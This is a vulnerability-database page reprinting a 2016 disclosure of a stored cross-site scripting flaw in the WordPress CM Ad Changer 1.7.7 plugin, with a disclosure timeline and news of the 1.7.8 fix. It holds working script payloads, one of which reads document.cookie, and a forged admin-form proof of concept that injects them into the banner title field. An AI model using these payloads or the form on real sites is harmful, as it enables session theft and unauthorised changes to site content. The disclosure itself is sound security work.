Lucene search
K

WordPress CM Ad Changer 1.7.7 Cross Site Scripting

🗓️ 11 Jun 2016 00:00:00Reported by Aaditya PuraniType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 33 Views

WordPress CM Ad Changer 1.7.7 Cross Site Scripting vulnerability reported and fixed

Code
`#Exploit Title: CM Ad Changer Plugin XSS  
#Date: 9/6/2016  
#Exploit Author: Aaditya Purani  
#Author Homepage: https://aadityapurani.com  
#Vendor Homepage: https://ad-changer.cminds.com  
#Software Link: https://downloads.wordpress.org/plugins/cm-ad-changer.zip  
(Updated)  
#Version: 1.7.7  
#Tested on: Wordpress 4.5.2  
#Category: Web applications  
  
Description:  
An Stored Cross Site Scripting was reported by me to CM Ad Plugins under  
which an Unprivileged user can Trigger a Stored XSS to perform malicious  
action or any attacker could send a Crafted link which can trigger Stored  
XSS  
  
Steps to Produce:  
  
1) Go to CM Ad changers -> Campaigns  
  
2) Create a Campaign. Enter whatever you want in Campaign settings, in the  
next tab "Campaign Banners", select an Image in Campaign images and in  
Banner Title enter this payload  
</script><script>confirm(/aaditya/)</script>  
</script><script>confirm(document.cookie)</script>  
  
3) Enter Save & Payload triggers everytime you Return.  
  
Attacker Can Make a Payload File containing the following:  
  
<html>  
  
<body>  
<h1> Click The button below. POC By Aaditya Purani:: CM AD Changer  
1.7.7 </h1>  
<form action="  
http://127.0.0.1/wordpress/wp-admin/admin.php?page=cmac_campaigns&action=edit&campaign_id={TARGET_ID}"  
method="POST">  
<input type="hidden" name="campaign_id" value="1" />  
<input type="hidden" name="title" value="Hacked by Aaditya" />  
<input type="hidden" name="comment" value="" />  
<input type="hidden" name="link" value="" />  
<input type="hidden" name="status" value="on" />  
<input type="hidden" name="banner_display_method" value="selected" />  
<input type="hidden" name="banner_filename[]"  
value="yourpicvalue.jpg" />  
<input type="hidden" name="banner_title[]"  
value="</script><script>confirm(/aaditya/)</script>" />  
<input type="hidden" name="banner_title_tag[]" value="" />  
<input type="hidden" name="banner_tag[]" value="" />  
<input type="hidden" name="banner_link[]" value="" />  
<input type="hidden" name="banner_weight[]" value="0" />  
<input type="hidden" name="selected_banner" value="yourpicvalue.jpg"  
/>  
<input type="hidden" name="submit" value="Save" />  
<input type="submit" value="Submit request" />  
</form>  
</body>  
</html>  
  
This will Trigger Stored XSS at banner_title Parameter.  
  
It has been fixed and Version 1.7.8 Released on 9th June  
Visit Here:  
https://ad-changer.cminds.com/cm-ad-changer-plugin-free-edition-release-notes  
  
---------Timeline----------  
  
1st June : Reported to Vendor Creative Minds  
3rd June: Additional Information provided  
6th June: Team will able to reproduce  
7th June: Fix and confirmed by me  
9th June: Publically Fix released & Changelog updated 1.7.8  
  
Regards,  
Aaditya Purani  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

11 Jun 2016 00:00Current
7.4High risk
Vulners AI Score7.4
33